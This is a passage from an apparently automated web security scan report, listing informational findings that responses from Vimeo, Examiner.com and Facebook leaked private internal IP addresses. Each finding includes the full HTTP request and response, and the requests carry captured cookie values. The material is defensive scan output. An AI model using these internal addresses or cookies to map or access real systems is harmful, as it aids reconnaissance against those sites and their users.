Expires: Wed, 11 May 2011 13:32:00 GMT
Last-Modified: Fri, 13 May 2011 13:32:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www255
Content-Length: 0
Content-Type: text/plain

17.40. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7013723&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Thu, 12 May 2011 01:34:36 GMT
X-Server: 10.90.128.69
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.41. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7023103&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Thu, 12 May 2011 01:34:27 GMT
X-Server: 10.90.128.73
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.42. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7018402&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 12 May 2011 01:34:27 GMT
X-Server: 10.90.6.191
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.43. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7023636&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 12 May 2011 01:34:27 GMT
X-Server: 10.90.6.250
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.44. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7023126&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 12 May 2011 01:34:27 GMT
X-Server: 10.90.6.210
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.45. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7023113&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Thu, 12 May 2011 01:34:27 GMT
X-Server: 10.90.128.70
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.46. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=7024392&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Thu, 12 May 2011 01:34:26 GMT
X-Server: 10.90.128.72
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/
...[SNIP]...
17.47. http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.examiner.com
Path:   /fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds HTTP/1.1
Host: www.examiner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 12 May 2011 13:31:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Expires: Fri, 13 May 2011 13:31:46 +0000
Last-Modified: Thu, 12 May 2011 13:31:46 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1305207106"
Set-Cookie: EXAMINEREDITION=921; expires=Sun, 09-May-2021 13:31:46 GMT; path=/; domain=.examiner.com
X-Generator: Drupal 7 (http://drupal.org)
X-WebNode: web7.b.examiner.com
Vary: Accept-Encoding
Content-Length: 87125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
minercom","zip":null};;
$LAB.script("http:\/\/cdn2-b.examiner.com\/sites\/all\/modules\/custom\/ex_omniture\/s_code.js").wait(function () {
s.pageName="Examiner Article";
s.channel="Sports";
s.server="192.168.1.55";
s.pageType="";
s.prop1="Fight Sports";
s.prop2="";
s.prop3="";
s.prop4="ARTICLE EXENTRY:33045071";
s.prop5="Complete WWE SmackDown Spoilers for Friday May 13th, New 'face' and new feuds";
s.prop6="R
...[SNIP]...
17.48. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=49133838740&uniqid=stream_content HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US
X-SVN-Rev: 377323
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.27.80.107
X-Cnection: close
Date: Thu, 12 May 2011 13:32:17 GMT
Content-Length: 105512

for (;;);{"__ar":1,"payload":null,"css":["eFfLJ"],"onload":["DOM.setContent(DOM.find(document.documentElement, \"#stream_content\"), HTML(\"\\u003cdiv id=\\\"div_story_4dcbe161068154146468326\\\" data
...[SNIP]...
17.49. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=49133838740&connections=10&stream=1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.71.123
X-Cnection: close
Date: Thu, 12 May 2011 13:32:01 GMT
Content-Length: 12141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
17.50. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=ac9bdc9b7d0229f7a0e53acc8948bd61&app_id=ac9bdc9b7d0229f7a0e53acc8948bd61&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2620108cc%26origin%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%252Ff13c73285c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df26f5a783%26origin%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%252Ff13c73285c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24534119c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df54d5d18%26origin%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%252Ff13c73285c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24534119c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df352d2e668%26origin%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%252Ff13c73285c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24534119c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df22728a73%26origin%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%252Ff13c73285c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24534119c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f352d2e668&origin=http%3A%2F%2Fwww.greenfieldreporter.com%2Ff13c73285c&relation=parent&transport=postmessage&frame=f24534119c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.47.115
X-Cnection: close
Date: Thu, 12 May 2011 13:30:49 GMT
Content-Length: 0

17.51. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=361237392572&app_id=361237392572&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df28664989%26origin%3Dhttp%253A%252F%252Fwww.courierpress.com%252Ff1fabc16a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df11d8e3f8%26origin%3Dhttp%253A%252F%252Fwww.courierpress.com%252Ff1fabc16a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2244fb91%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc104955c%26origin%3Dhttp%253A%252F%252Fwww.courierpress.com%252Ff1fabc16a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2244fb91&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df29ff22598%26origin%3Dhttp%253A%252F%252Fwww.courierpress.com%252Ff1fabc16a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2244fb91&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df30651903c%26origin%3Dhttp%253A%252F%252Fwww.courierpress.com%252Ff1fabc16a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2244fb91&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f29ff22598&origin=http%3A%2F%2Fwww.courierpress.com%2Ff1fabc16a&relation=parent&transport=postmessage&frame=f2244fb91
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.90.127
X-Cnection: close
Date: Thu, 12 May 2011 13:30:51 GMT
Content-Length: 0

17.52. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=113003962065478&app_id=113003962065478&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df26431ae5%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3d851c2cc%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29f011d34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df350818ed8%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29f011d34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df17f01575c%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29f011d34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2f5a50d1%26origin%3Dhttp%253A%252F%252Fwww.examiner.com%252Ff2d38411%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29f011d34&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f17f01575c&origin=http%3A%2F%2Fwww.examiner.com%2Ff2d38411&relation=parent&transport=postmessage&frame=f29f011d34
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.14.109
X-Cnection: close
Date: Thu, 12 May 2011 13:33:23 GMT
Content-Length: 0
Elapsed: 0.013

17.53. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=116628718381794&app_id=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2f44d4d1%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfbcf69398%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df9a216678%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df324a3981c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df5c90ca8c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f324a3981c&origin=http%3A%2F%2Fmashable.com%2Ff7ed6dd3c&relation=parent&transport=postmessage&frame=f36ad9bf08
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.63.106
X-Cnection: close
Date: Thu, 12 May 2011 13:28:41 GMT
Content-Length: 0

17.54. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=119251788156770&app_id=119251788156770&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3054b7228%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1530c7d68%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d93d598%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1390e1ef%26origin%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Ff3467bb41c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d9